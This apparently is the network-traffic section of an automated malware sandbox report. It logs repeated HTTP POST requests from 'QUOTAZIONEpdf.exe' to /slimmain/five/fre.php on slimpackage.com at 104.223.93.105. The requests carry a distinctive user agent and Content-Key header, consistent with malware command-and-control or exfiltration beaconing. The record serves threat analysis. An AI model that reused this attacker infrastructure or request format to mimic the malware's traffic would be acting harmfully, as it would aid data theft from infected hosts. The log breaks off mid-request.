              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              22 | 192.168.2.3 | 49766 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:53:18.230034113 CET | 1161 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:18.484214067 CET | 1163 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:17 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              23 | 192.168.2.3 | 49770 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:53:19.843821049 CET | 1166 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:20.097187996 CET | 1167 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:19 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              24 | 192.168.2.3 | 49771 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:53:21.176589966 CET | 1168 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:21.435849905 CET | 1168 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:20 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              25 | 192.168.2.3 | 49772 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:53:22.793267965 CET | 1169 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:23.150387049 CET | 1170 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:21 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              26 | 192.168.2.3 | 49773 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:53:25.250387907 CET | 1171 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:25.508188009 CET | 1171 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:24 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              27 | 192.168.2.3 | 49775 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:53:26.628571033 CET | 1245 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:26.881258965 CET | 1298 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:25 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              28 | 192.168.2.3 | 49781 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:53:28.069977045 CET | 1431 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:28.325772047 CET | 1465 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:27 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              29 | 192.168.2.3 | 49789 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:53:29.435189962 CET | 1800 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:29.699652910 CET | 1912 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:28 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              3 | 192.168.2.3 | 49745 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:52:43.225955009 CET | 1109 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:43.481673956 CET | 1109 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:42 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              30 | 192.168.2.3 | 49806 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:53:32.376585007 CET | 1984 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:32.632582903 CET | 1987 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:31 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              31 | 192.168.2.3 | 49813 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:53:34.797107935 CET | 2000 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:35.055516958 CET | 2000 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:33 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              32 | 192.168.2.3 | 49814 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:53:38.518335104 CET | 2001 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:38.778532028 CET | 2002 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:37 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              33 | 192.168.2.3 | 49815 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:53:42.966613054 CET | 2003 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:43.286082029 CET | 2005 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:42 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              34 | 192.168.2.3 | 49821 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:53:50.386625051 CET | 9596 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:50.642754078 CET | 9596 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:49 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              35 | 192.168.2.3 | 49822 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:53:54.269267082 CET | 9597 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:54.529158115 CET | 9598 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:53 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              36 | 192.168.2.3 | 49824 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:53:57.036107063 CET | 10122 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:57.289953947 CET | 10273 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:56 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              37 | 192.168.2.3 | 49825 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:53:59.975080013 CET | 10274 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:00.267862082 CET | 10274 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:59 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              38 | 192.168.2.3 | 49826 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:54:02.086796045 CET | 10275 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:02.343744040 CET | 10276 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:01 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              39 | 192.168.2.3 | 49832 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:54:03.505878925 CET | 10288 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:03.763714075 CET | 10292 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:02 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              4 | 192.168.2.3 | 49746 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:52:44.662959099 CET | 1110 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:44.925323009 CET | 1111 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:43 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              40 | 192.168.2.3 | 49840 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:54:04.907351017 CET | 10305 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:05.161437035 CET | 10309 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:04 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              41 | 192.168.2.3 | 49852 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:54:07.608302116 CET | 10337 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:07.866544008 CET | 10338 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:06 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              42 | 192.168.2.3 | 49853 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:54:10.712951899 CET | 10338 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:10.966197014 CET | 10339 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:09 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              43 | 192.168.2.3 | 49854 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:54:14.681171894 CET | 10340 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:14.940711975 CET | 10340 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:13 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              44 | 192.168.2.3 | 49855 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:54:17.053160906 CET | 10341 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:17.313810110 CET | 10342 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:16 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              45 | 192.168.2.3 | 49856 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:54:20.315522909 CET | 10343 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:20.574155092 CET10344INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:19 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID: 46 | Source IP: 192.168.2.3 | Source Port: 49857 | Destination IP: 104.223.93.105 | Destination Port: 80 | Process: C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:54:22.278675079 CET | 10345 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:22.548707962 CET | 10345 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:21 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID: 47 | Source IP: 192.168.2.3 | Source Port: 49858 | Destination IP: 104.223.93.105 | Destination Port: 80 | Process: C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:54:24.759273052 CET | 10346 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:25.014372110 CET | 10347 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:23 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID: 48 | Source IP: 192.168.2.3 | Source Port: 49859 | Destination IP: 104.223.93.105 | Destination Port: 80 | Process: C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:54:26.128942013 CET | 10347 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:26.390346050 CET | 10348 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:25 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID: 49 | Source IP: 192.168.2.3 | Source Port: 49860 | Destination IP: 104.223.93.105 | Destination Port: 80 | Process: C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:54:27.459033012 CET | 10349 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:27.717861891 CET | 10349 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:26 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID: 5 | Source IP: 192.168.2.3 | Source Port: 49747 | Destination IP: 104.223.93.105 | Destination Port: 80 | Process: C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:52:46.652462959 CET | 1111 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:46.909101009 CET | 1112 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:45 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID: 50 | Source IP: 192.168.2.3 | Source Port: 49861 | Destination IP: 104.223.93.105 | Destination Port: 80 | Process: C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:54:28.746130943 CET | 10350 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:29.017143965 CET | 10351 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:27 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID: 51 | Source IP: 192.168.2.3 | Source Port: 49862 | Destination IP: 104.223.93.105 | Destination Port: 80 | Process: C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:54:30.197088957 CET | 10352 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
